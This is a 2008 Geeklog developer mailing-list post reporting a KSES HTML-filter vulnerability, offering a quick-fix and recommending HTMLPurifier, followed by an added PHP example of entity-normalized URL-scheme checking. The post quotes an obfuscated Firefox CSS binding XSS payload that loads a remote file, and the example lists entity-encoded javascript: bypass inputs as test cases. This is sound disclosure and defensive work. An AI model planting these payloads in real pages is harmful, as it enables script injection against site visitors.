[geeklog-devel] KSES Vulnerability in 1.4.1/1.40sr6

Mark Howard mark at the-howards.net
Sat Apr 26 11:52:49 EDT 2008


Tap .. tap..  is this thing on?  :^)

OK, so I have confirmed that this can be exploited in the KSES class included
with 1.4.1.

I know your instructions ask that an exploit be included; however, it is not
my practice to share exploits of my own creation. The advisory lists a few
examples:

http://seclists.org/bugtraq/2008/Apr/0028.html

Here is the quick-fix, implemented in the class as recommended in the
advisory. It seems to work (my exploit now fails), but I would appreciate
it if others could test/validate.

http://the-howards.net/kses.class.zip

Note that this fix only prevents PHP code execution when kses is called
without prior entity normalization, and also the bypass of the protocol check;
it does not deal with XSS attacks originating from exploits via CSS style
directives, e.g.:

(Firefox) <a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67:
\75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\65\72\73\2E\6F&#9
2;72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73\73)"
href="http://example.com">test</a>

Only a more robust/supported solution such as HTMLPurifier would represent a
best-effort fix for such a thing.  Still, perhaps this merits a
notification/fixpack containing the quick-fix for 1.4.1 users; you don't have
to say it's a complete solution.

If I get really ambitious over the weekend, I'll have a crack at modifying the
kses class to utilize the HTMLPurifier wrapper, thus making it a
comprehensive drop-in fix for 1.4.1, while also permitting direct use of the
HTMLPurifier class for new code.

In case someone else has more time than I, here is the link to the wrapper
again:

http://htmlpurifier.org/svnroot/htmlpurifier/trunk/library/HTMLPurifier.kses.php

My good deed for the day.

-m
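The general rule behind the quick-fix described in the message above (normalize character references before inspecting a URL's scheme, so an encoded scheme cannot slip past the protocol allowlist), shown as an added PHP example. This is illustrative code written for this page; it is not the patched kses class from the zip, not Geeklog code and not HTMLPurifier. The function names `normalized_scheme` and `filter_href`, the allowlist and the sample inputs are assumptions constructed for the illustration; it needs PHP 7.1 or later for the type declarations.

```php
<?php
// Added illustration (not the kses patch, not Geeklog, not HTMLPurifier):
// decode entities first, strip characters browsers ignore inside a scheme,
// and only then compare the scheme against an allowlist.

/**
 * Return the lower-cased scheme of $url after entity normalization, or ''
 * when the URL carries no scheme (relative path, query or fragment).
 */
function normalized_scheme(string $url): string
{
    // Step 1: decode named, decimal and hex references (&#106; &#x6A; &colon;)
    $decoded = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // Step 2: browsers drop ASCII control characters and whitespace found
    // inside a scheme, so the check must see the URL the way a browser does.
    $decoded = preg_replace('/[\x00-\x20\x7f]+/', '', $decoded);

    // Step 3: a scheme is a run of scheme characters ending at the first ':';
    // anything else (leading '/', '?', '#', or a '/' before the colon) is a path.
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $decoded, $m)) {
        return strtolower($m[1]);
    }
    return '';
}

/**
 * Keep $url only if it is relative or its normalized scheme is allowlisted;
 * return null otherwise so the caller can drop the attribute entirely.
 */
function filter_href(string $url, array $allowed = ['http', 'https', 'mailto', 'ftp']): ?string
{
    $scheme = normalized_scheme($url);
    if ($scheme === '' || in_array($scheme, $allowed, true)) {
        return $url;
    }
    return null;
}

// Constructed sample inputs for a quick self-check (not taken from the advisory).
$samples = [
    'http://example.com/page',       // plain absolute URL: kept
    '/relative/path?x=1',            // relative URL, no scheme: kept
    '&#106;avascript:alert(1)',      // decimal entity hides the scheme: rejected
    'java&#x09;script:alert(1)',     // hex entity for TAB inside the scheme: rejected
    'JAVASCRIPT:alert(1)',           // case variant: rejected
];
foreach ($samples as $s) {
    printf("%-32s => %s\n", $s, filter_href($s) === null ? 'rejected' : 'kept');
}
```

A check that runs before normalization sees the literal text `&#106;avascript:` and finds no scheme at all, which is exactly the class of bypass the message says the quick-fix closes. Entity decoders also differ in leniency (for example in how they treat references without a terminating semicolon), and the CSS-escape case shown above is not a URL-scheme problem at all; both are reasons the message's recommendation of a maintained sanitizer such as HTMLPurifier is the better long-term answer than a one-off check like this one.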